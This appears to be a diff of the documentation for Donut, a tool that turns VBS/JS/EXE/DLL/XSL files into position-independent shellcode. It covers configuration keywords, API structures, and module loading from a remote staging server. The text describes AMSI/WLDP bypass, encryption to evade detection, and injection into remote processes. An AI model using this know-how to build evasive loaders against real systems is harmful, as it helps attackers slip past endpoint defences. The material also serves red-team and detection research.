46 bypass=3, # Bypass AMSI/WLDP : 1=none, 2=abort on fail, 3=continue on fail.(default)
4747 cls='namespace.class', # Optional class name. (required for .NET DLL)
4848 method='method', # Optional method or API name for DLL. (method is required for .NET DLL)
49 params='arg1,arg2', # Optional parameters or command line, separated by comma or semi-colon.
49 params='arg1 arg2', # Optional parameters or command line.
5050 runtime='version', # CLR runtime version. MetaHeader used by default or v4.0.30319 if none available
5151 appdomain='name' # AppDomain name to create for .NET. Randomly generated by default.
5252 )
5353 ```
5454
55 ## Keywords
56
57 The following table lists key words for the create method.
58
59 <table>
60 <tr>
61 <th>Keyword</th>
62 <th>Type</th>
63 <th>Description</th>
64 </tr>
65 <tr>
66 <td>file</td>
67 <td>String</td>
68 <td>The path of file to execute in memory. VBS/JS/EXE/DLL files are supported.</td>
69 </tr>
70 <tr>
71 <td>arch</td>
72 <td>Integer</td>
73 <td>Indicates the type of assembly code to generate. 1=<code>DONUT_ARCH_X86</code> and 2=<code>DONUT_ARCH_X64</code> are self-explanatory. 3=<code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both X86 and AMD64. ARM64 will be supported at some point.</td>
74 </tr>
75 <tr>
76 <td>bypass</td>
77 <td>Integer</td>
78 <td>Specifies behaviour of the code responsible for bypassing AMSI and WLDP. The current options are 1=<code>DONUT_BYPASS_NONE</code> which indicates that no attempt be made to disable AMSI or WLDP. 2=<code>DONUT_BYPASS_ABORT</code> indicates that failure to disable should result in aborting execution of the module. 3=<code>DONUT_BYPASS_CONTINUE</code> indicates that even if AMSI/WDLP bypasses fail, the shellcode will continue with execution.</td>
79 </tr>
80 <tr>
81 <td>compress</td>
82 <td>Integer</td>
83 <td>Indicates if the input file should be compressed. Available engines are 1=<code>DONUT_COMPRESS_NONE</code>, 2=<code>DONUT_COMPRESS_APLIB</code> to use the <a href="http://ibsensoftware.com/products_aPLib.html">aPLib</a> algorithm. For builds on Windows, the <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtlcompressbuffer">RtlCompressBuffer</a> API is available and supports 3=<code>DONUT_COMPRESS_LZNT1</code>, 4=<code>DONUT_COMPRESS_XPRESS</code> and 5=<code>DONUT_COMPRESS_XPRESS_HUFF</code>.</td>
84 </tr>
85 <tr>
86 <td>entropy</td>
87 <td>Integer</td>
88 <td>Indicates whether Donut should use entropy and/or encryption for the loader to help evade detection. Available options are 1=<code>DONUT_ENTROPY_NONE</code>, 2=<code>DONUT_ENTROPY_RANDOM</code>, which generates random strings and 3=<code>DONUT_ENTROPY_DEFAULT</code> that combines <code>DONUT_ENTROPY_RANDOM</code> with symmetric encryption.</td>
89 </tr>
90 <tr>
91 <td>format</td>
92 <td>Integer</td>
93 <td>Specifies the output format for the shellcode loader. Supported formats are 1=<code>DONUT_FORMAT_BINARY</code>, 2=<code>DONUT_FORMAT_BASE64</code>, 3=<code>DONUT_FORMAT_RUBY</code>, 4=<code>DONUT_FORMAT_C</code>, 5=<code>DONUT_FORMAT_PYTHON</code>, 6=<code>DONUT_FORMAT_POWERSHELL</code>, 7=<code>DONUT_FORMAT_CSHARP</code> and 8=<code>DONUT_FORMAT_HEX</code>. On Windows, the base64 string is copied to the clipboard.</td>
94 </tr>
95 <tr>
96 <td>exit_opt</td>
97 <td>Integer</td>
98 <td>When the shellcode ends, <code>RtlExitUserThread</code> is called, which is the default behaviour. Use 2=<code>DONUT_OPT_EXIT_PROCESS</code> to terminate the host process via the <code>RtlExitUserProcess</code> API.</td>
99 </tr>
100 <tr>
101 <td>thread</td>
102 <td>Integer</td>
103 <td>If the file is an unmanaged EXE, the loader will run the entrypoint as a thread. The loader also attempts to intercept calls to exit-related API stored in the Import Address Table by replacing those pointers with the address of the <code>RtlExitUserThread</code> API. However, hooking via IAT is generally unreliable and Donut may use code splicing / hooking in the future.</td>
104 </tr>
105 <tr>
106 <td>oep</td>
107 <td>String</td>
108 <td>Tells the loader to create a new thread before continuing execution at the OEP provided by the user. Address should be in hexadecimal format.</td>
109 </tr>
110 <tr>
111 <td>output</td>
112 <td>String</td>
113 <td>The path of where to save the shellcode/loader. Default is "loader.bin".</td>
114 </tr>
115 <tr>
116 <td>runtime</td>
117 <td>String</td>
118 <td>The CLR runtime version to use for a .NET assembly. If none is provided, Donut will try reading from the PE's COM directory. If that fails, v4.0.30319 is used by default.</td>
119 </tr>
120 <tr>
121 <td>appdomain</td>
122 <td>String</td>
123 <td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly. If entropy is disabled, it will be set to "AAAAAAAA"</td>
124 </tr>
125 <tr>
126 <td>cls</td>
127 <td>String</td>
128 <td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</td>
129 </tr>
130 <tr>
131 <td>method</td>
132 <td>String</td>
133 <td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td>
134 </tr>
135 <tr>
136 <td>params</td>
137 <td>String</td>
138 <td>List of parameters for the .NET method or DLL function. For unmanaged EXE files, a 4-byte string is generated randomly to act as the module name. If entropy is disabled, this will be "AAAA"</td>
139 </tr>
140 <tr>
141 <td>unicode</td>
142 <td>Integer</td>
143 <td>By default, the <code>params</code> string is passed to an unmanaged DLL function as-is, in ANSI format. If set, param is converted to UNICODE.</td>
144 </tr>
145 <tr>
146 <td>url or server</td>
147 <td>String</td>
148 <td>If the instance type is <code>DONUT_INSTANCE_HTTP</code>, this should contain the server and path of where module will be stored. e.g: https://www.staging-server.com/modules/</td>
149 </tr>
150 <tr>
151 <td>modname</td>
152 <td>String</td>
153 <td>If the type is <code>DONUT_INSTANCE_HTTP</code>, this will contain the name of the module for where to save the contents of <code>mod</code> to disk. If none is provided by the user, it will be generated randomly. If entropy is disabled, it will be set to "AAAAAAAA"</td>
154 </tr>
155 </table>
156
55157 ## Author
56158
57159 The Python extension was written by [@byt3bl33d3r](https://twitter.com/byt3bl33d3r)
+0
-511
docs/api.html less more
0
1 <html>
2 <body>
3
4 <h3>API</h3>
5
6 <ul>
7 <li><code>int DonutCreate(PDONUT_CONFIG pConfig)</code></li>
8 <li><code>int DonutDelete(PDONUT_CONFIG pConfig)</code></li>
9 </ul>
10
11 <p>When provided with a valid configuration, <code>DonutCreate</code> will generate a shellcode to execute a VBS/JS/EXE/DLL or XSL files in-memory. If the function returns <code>DONUT_ERROR_SUCCESS</code>, the configuration will contain three components:</p>
12
13 <ol>
14 <li>An encrypted <var>Instance</var></li>
15 <li>An encrypted <var>Module</var></li>
16 <li>A position-independent code (PIC) or shellcode with <var>Instance</var> embedded in it.</li>
17 </ol>
18
19 <p>The key to decrypt the <var>Module</var> is stored in the <var>Instance</var> so that if a module is discovered on a staging server by an adversary, it should not be possible to decrypt the contents without the instance. <code>DonutDelete</code> will release any memory allocated by a successful call to <code>DonutCreate</code>. The <var>Instance</var> will already be attached to the PIC ready for executing in-memory, but the module may require saving to disk if the PIC will retrieve it from a remote staging server.</p>
20
21 <h3>Configuration</h3>
22
23 <p>A configuration requires a target architecture (only x86 and x86-64 are currently supported), a path to a VBS/JS/EXE/DLL or XML file that will be executed in-memory by the shellcode, a namespace/class for a .NET assembly, including the name of a method to invoke and any parameters passed to the method. If the module will be stored on a staging server, a URL is required, but not a module name because that will be generated randomly.</p>
24
25 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CONFIG <span style='color:#800080; '>{</span>
26 <span style='color:#800000; font-weight:bold; '>int</span> arch<span style='color:#800080; '>;</span> <span style='color:#696969; '>// target architecture for shellcode </span>
27 <span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of domain to create for assembly</span>
28 <span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace</span>
29 <span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to execute</span>
30 <span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span><span style='color:#808030; '>(</span>DONUT_MAX_PARAM<span style='color:#808030; '>+</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#808030; '>*</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters passed to method, separated by comma or semi-colon</span>
31 <span style='color:#800000; font-weight:bold; '>char</span> file<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// assembly to create module from </span>
32 <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to root path of where module will be on remote http server</span>
33 <span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version to use.</span>
34 <span style='color:#800000; font-weight:bold; '>char</span> modname<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of module written to disk</span>
35
36 <span style='color:#800000; font-weight:bold; '>int</span> mod_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// .NET EXE/DLL, VBS,JS,EXE,DLL,XSL</span>
37 uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_MODULE</span>
38 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>mod<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut module</span>
39
40 <span style='color:#800000; font-weight:bold; '>int</span> inst_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL</span>
41 uint64_t inst_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_INSTANCE</span>
42 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>inst<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut instance</span>
43
44 uint64_t pic_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of shellcode</span>
45 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>pic<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to PIC/shellcode</span>
46 <span style='color:#800080; '>}</span> DONUT_CONFIG<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CONFIG<span style='color:#800080; '>;</span>
47 </pre>
48
49 <table border="1">
50 <tr>
51 <th>Member</th>
52 <th>Description</th>
53 </tr>
54 <tr>
55 <td><code>arch</code></td>
56 <td>Indicates the type of assembly code to generate. <code>DONUT_ARCH_X86</code> and <code>DONUT_ARCH_X64</code> are self-explanatory. <code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both x86 and amd64. ARM64 will be supported at some point.</td>
57 </tr>
58 <tr>
59 <td><code>domain</code></td>
60 <td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly.</td>
61 </tr>
62 <tr>
63 <td><code>cls</code></td>
64 <td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</var></td>
65 </tr>
66 <tr>
67 <td><code>method</code></td>
68 <td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td>
69 </tr>
70 <tr>
71 <td><code>param</code></td>
72 <td>Contains a list of parameters for the .NET method or DLL function. Each separated by semi-colon or comma.</td>
73 </tr>
74 <tr>
75 <td><code>file</code></td>
76 <td>The path of a supported file type: VBS/JS/EXE/DLL or XSL.</td>
77 </tr>
78 <tr>
79 <td><code>url</code></td>
80 <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should contain the server and path of where module will be stored. e.g: https://www.rogueserver.com/modules/</td>
81 </tr>
82 <tr>
83 <td><code>runtime</code></td>
84 <td>The CLR runtime version to use for the .NET assembly. If none is provided, donut will try read from meta header. If that fails, v4.0.30319 is used by default.</td>
85 </tr>
86 <tr>
87 <td><code>modname</code></td>
88 <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this will contain a randomly generated name for the module that should be used when saving the contents of <code>mod</code> to disk.</td>
89 </tr>
90 <tr>
91 <td><code>mod_type</code></td>
92 <td>Indicates the type of file detected by <code>DonutCreate</code>. For example, <code>DONUT_MODULE_VBS</code> indicates a VBScript file.</td>
93 </tr>
94 <tr>
95 <td><code>mod_len</code></td>
96 <td>The total size of the <var>Module</var> pointed to by <code>mod</code>.</td>
97 </tr>
98 <tr>
99 <td><code>mod</code></td>
100 <td>Points to encrypted <var>Module</var>. If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should be saved to file using the <code>modname</code> and accessible via HTTP server.</td>
101 </tr>
102 <tr>
103 <td><code>inst_type</code></td>
104 <td><code>DONUT_INSTANCE_PIC</code> indicates a self-contained payload which means the .NET assembly is embedded in executable code. <code>DONUT_INSTANCE_URL</code> indicates the .NET assembly is stored on a remote server with a URL embedded in the instance.</td>
105 </tr>
106 <tr>
107 <td><code>inst_len</code></td>
108 <td>The total size of the <var>Instance</var> pointed to by <code>inst</code>.</td>
109 </tr>
110 <tr>
111 <td><code>inst</code></td>
112 <td>Points to an encrypted <var>Instance</var> after a successful call to <code>DonutCreate</code>. Since it's already attached to the <code>pic</code>, this is only provided for debugging purposes.</td>
113 </tr>
114 <tr>
115 <td><code>pic_len</code></td>
116 <td>The size of data pointed to by <code>pic</code>.</td>
117 </tr>
118 <tr>
119 <td><code>pic</code></td>
120 <td>Points to executable code for the target architecture which also contains an instance. This should be injected into a remote process.</td>
121 </tr>
122 </table>
123
124 <p>Everything that follows here concerns internal workings of Donut and is not required to generate a payload.</p>
125
126 <h3>Instance</h3>
127
128 <p>The position-independent code will always contain an <var>Instance</var> which can be viewed simply as a configuration for the code itself. It will contain all the data that would normally be stored on the stack or in the <code>.data</code> and <code>.rodata</code> sections of an executable. Once the main code executes, it will decrypt the instance before attempting to resolve the address of API functions. If successful, it will check if an executable file is embedded or must be downloaded from a remote staging server. To verify successful decryption of a module, a randomly generated string stored in the <code>sig</code> field is hashed using <var>Maru</var> and compared with the value of <code>mac</code>.</p>
129
130 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for an instance goes into the following structure</span>
131 <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_INSTANCE <span style='color:#800080; '>{</span>
132 uint32_t len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of instance</span>
133 DONUT_CRYPT key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// decrypts instance</span>
134
135 uint64_t iv<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit initial value for maru hash</span>
136
137 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
138 uint64_t hash<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api hashes</span>
139 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>addr<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api addresses</span>
140 <span style='color:#696969; '>// include prototypes only if header included from payload.h</span>
141 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>ifdef</span><span style='color:#004a43; '> PAYLOAD_H</span>
142 <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span>
143 <span style='color:#696969; '>// imports from kernel32.dll or kernelbase.dll</span>
144 LoadLibraryA_t LoadLibraryA<span style='color:#800080; '>;</span>
145 GetProcAddress_t <span style='color:#400000; '>GetProcAddress</span><span style='color:#800080; '>;</span>
146 GetModuleHandleA_t GetModuleHandleA<span style='color:#800080; '>;</span>
147 VirtualAlloc_t <span style='color:#400000; '>VirtualAlloc</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// required to allocate RW memory for instance </span>
148 VirtualFree_t <span style='color:#400000; '>VirtualFree</span><span style='color:#800080; '>;</span>
149 VirtualQuery_t <span style='color:#400000; '>VirtualQuery</span><span style='color:#800080; '>;</span>
150 VirtualProtect_t <span style='color:#400000; '>VirtualProtect</span><span style='color:#800080; '>;</span>
151 Sleep_t <span style='color:#400000; '>Sleep</span><span style='color:#800080; '>;</span>
152 MultiByteToWideChar_t <span style='color:#400000; '>MultiByteToWideChar</span><span style='color:#800080; '>;</span>
153 GetUserDefaultLCID_t <span style='color:#400000; '>GetUserDefaultLCID</span><span style='color:#800080; '>;</span>
154
155 <span style='color:#696969; '>// imports from oleaut32.dll</span>
156 SafeArrayCreate_t SafeArrayCreate<span style='color:#800080; '>;</span>
157 SafeArrayCreateVector_t SafeArrayCreateVector<span style='color:#800080; '>;</span>
158 SafeArrayPutElement_t SafeArrayPutElement<span style='color:#800080; '>;</span>
159 SafeArrayDestroy_t SafeArrayDestroy<span style='color:#800080; '>;</span>
160 SafeArrayGetLBound_t SafeArrayGetLBound<span style='color:#800080; '>;</span>
161 SafeArrayGetUBound_t SafeArrayGetUBound<span style='color:#800080; '>;</span>
162 SysAllocString_t SysAllocString<span style='color:#800080; '>;</span>
163 SysFreeString_t SysFreeString<span style='color:#800080; '>;</span>
164 LoadTypeLib_t LoadTypeLib<span style='color:#800080; '>;</span>
165
166 <span style='color:#696969; '>// imports from wininet.dll</span>
167 InternetCrackUrl_t InternetCrackUrl<span style='color:#800080; '>;</span>
168 InternetOpen_t InternetOpen<span style='color:#800080; '>;</span>
169 InternetConnect_t InternetConnect<span style='color:#800080; '>;</span>
170 InternetSetOption_t InternetSetOption<span style='color:#800080; '>;</span>
171 InternetReadFile_t InternetReadFile<span style='color:#800080; '>;</span>
172 InternetCloseHandle_t InternetCloseHandle<span style='color:#800080; '>;</span>
173 HttpOpenRequest_t HttpOpenRequest<span style='color:#800080; '>;</span>
174 HttpSendRequest_t HttpSendRequest<span style='color:#800080; '>;</span>
175 HttpQueryInfo_t HttpQueryInfo<span style='color:#800080; '>;</span>
176
177 <span style='color:#696969; '>// imports from mscoree.dll</span>
178 CorBindToRuntime_t CorBindToRuntime<span style='color:#800080; '>;</span>
179 CLRCreateInstance_t CLRCreateInstance<span style='color:#800080; '>;</span>
180
181 <span style='color:#696969; '>// imports from ole32.dll</span>
182 CoInitializeEx_t CoInitializeEx<span style='color:#800080; '>;</span>
183 CoCreateInstance_t CoCreateInstance<span style='color:#800080; '>;</span>
184 CoUninitialize_t CoUninitialize<span style='color:#800080; '>;</span>
185 <span style='color:#800080; '>}</span><span style='color:#800080; '>;</span>
186 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>endif</span>
187 <span style='color:#800080; '>}</span> api<span style='color:#800080; '>;</span>
188
189 <span style='color:#696969; '>// everything from here is encrypted</span>
190 <span style='color:#800000; font-weight:bold; '>int</span> api_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit hashes of API required for instance to work</span>
191 <span style='color:#800000; font-weight:bold; '>int</span> dll_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the number of DLL to load before resolving API</span>
192 <span style='color:#800000; font-weight:bold; '>char</span> dll_name<span style='color:#808030; '>[</span>DONUT_MAX_DLL<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// a list of DLL strings to load</span>
193
194 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
195 <span style='color:#800000; font-weight:bold; '>char</span> s<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// amsi.dll</span>
196 uint32_t w<span style='color:#808030; '>[</span><span style='color:#008c00; '>2</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span>
197 <span style='color:#800080; '>}</span> amsi<span style='color:#800080; '>;</span>
198
199 <span style='color:#800000; font-weight:bold; '>char</span> clr<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// clr.dll</span>
200 <span style='color:#800000; font-weight:bold; '>char</span> wldp<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wldp.dll</span>
201 <span style='color:#800000; font-weight:bold; '>char</span> wldpQuery<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpQueryDynamicCodeTrust</span>
202 <span style='color:#800000; font-weight:bold; '>char</span> wldpIsApproved<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpIsClassInApprovedList</span>
203
204 <span style='color:#800000; font-weight:bold; '>char</span> amsiInit<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiInitialize</span>
205 <span style='color:#800000; font-weight:bold; '>char</span> amsiScanBuf<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanBuffer</span>
206 <span style='color:#800000; font-weight:bold; '>char</span> amsiScanStr<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanString</span>
207
208 uint16_t wscript<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WScript</span>
209 uint16_t wscript_exe<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript.exe</span>
210
211 <span style='color:#603000; '>GUID</span> xIID_IUnknown<span style='color:#800080; '>;</span>
212 <span style='color:#603000; '>GUID</span> xIID_IDispatch<span style='color:#800080; '>;</span>
213
214 <span style='color:#696969; '>// GUID required to load .NET assemblies</span>
215 <span style='color:#603000; '>GUID</span> xCLSID_CLRMetaHost<span style='color:#800080; '>;</span>
216 <span style='color:#603000; '>GUID</span> xIID_ICLRMetaHost<span style='color:#800080; '>;</span>
217 <span style='color:#603000; '>GUID</span> xIID_ICLRRuntimeInfo<span style='color:#800080; '>;</span>
218 <span style='color:#603000; '>GUID</span> xCLSID_CorRuntimeHost<span style='color:#800080; '>;</span>
219 <span style='color:#603000; '>GUID</span> xIID_ICorRuntimeHost<span style='color:#800080; '>;</span>
220 <span style='color:#603000; '>GUID</span> xIID_AppDomain<span style='color:#800080; '>;</span>
221
222 <span style='color:#696969; '>// GUID required to run VBS and JS files</span>
223 <span style='color:#603000; '>GUID</span> xCLSID_ScriptLanguage<span style='color:#800080; '>;</span> <span style='color:#696969; '>// vbs or js</span>
224 <span style='color:#603000; '>GUID</span> xIID_IHost<span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript object</span>
225 <span style='color:#603000; '>GUID</span> xIID_IActiveScript<span style='color:#800080; '>;</span> <span style='color:#696969; '>// engine</span>
226 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptSite<span style='color:#800080; '>;</span> <span style='color:#696969; '>// implementation</span>
227 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse32<span style='color:#800080; '>;</span> <span style='color:#696969; '>// parser</span>
228 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse64<span style='color:#800080; '>;</span>
229
230 <span style='color:#696969; '>// GUID required to run XSL files</span>
231 <span style='color:#603000; '>GUID</span> xCLSID_DOMDocument30<span style='color:#800080; '>;</span>
232 <span style='color:#603000; '>GUID</span> xIID_IXMLDOMDocument<span style='color:#800080; '>;</span>
233 <span style='color:#603000; '>GUID</span> xIID_IXMLDOMNode<span style='color:#800080; '>;</span>
234
235 <span style='color:#800000; font-weight:bold; '>int</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL </span>
236
237 <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span>
238 <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// staging server hosting donut module</span>
239 <span style='color:#800000; font-weight:bold; '>char</span> req<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// just a buffer for "GET"</span>
240 <span style='color:#800080; '>}</span> http<span style='color:#800080; '>;</span>
241
242 uint8_t sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string to hash</span>
243 uint64_t mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption ok</span>
244
245 DONUT_CRYPT mod_key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// used to decrypt module</span>
246 uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of module</span>
247
248 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
249 PDONUT_MODULE p<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for URL</span>
250 DONUT_MODULE x<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for PIC</span>
251 <span style='color:#800080; '>}</span> module<span style='color:#800080; '>;</span>
252 <span style='color:#800080; '>}</span> DONUT_INSTANCE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_INSTANCE<span style='color:#800080; '>;</span>
253 </pre>
254
255 <h3>Module</h3>
256
257 <p>Modules can be embedded in an <var>Instance</var> or stored on a remote HTTP server.</p>
258
259 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for a module goes in the following structure</span>
260 <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_MODULE <span style='color:#800080; '>{</span>
261 <span style='color:#603000; '>DWORD</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// EXE, DLL, JS, VBS, XSL</span>
262 <span style='color:#603000; '>WCHAR</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version for .NET EXE/DLL</span>
263 <span style='color:#603000; '>WCHAR</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// domain name to use for .NET EXE/DLL</span>
264 <span style='color:#603000; '>WCHAR</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace for .NET EXE/DLL</span>
265 <span style='color:#603000; '>WCHAR</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to invoke for .NET DLL or api for unmanaged DLL</span>
266 <span style='color:#603000; '>DWORD</span> param_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// number of parameters for DLL/EXE</span>
267 <span style='color:#603000; '>WCHAR</span> param<span style='color:#808030; '>[</span>DONUT_MAX_PARAM<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters for DLL/EXE</span>
268 <span style='color:#603000; '>CHAR</span> sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// random string to verify decryption</span>
269 ULONG64 mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption was ok</span>
270 ULONG64 len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of EXE/DLL/XSL/JS/VBS file</span>
271 <span style='color:#603000; '>BYTE</span> data<span style='color:#808030; '>[</span><span style='color:#008c00; '>4</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// data of EXE/DLL/XSL/JS/VBS file</span>
272 <span style='color:#800080; '>}</span> DONUT_MODULE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_MODULE<span style='color:#800080; '>;</span>
273 </pre>
274
275 <h3>API Hashing</h3>
276
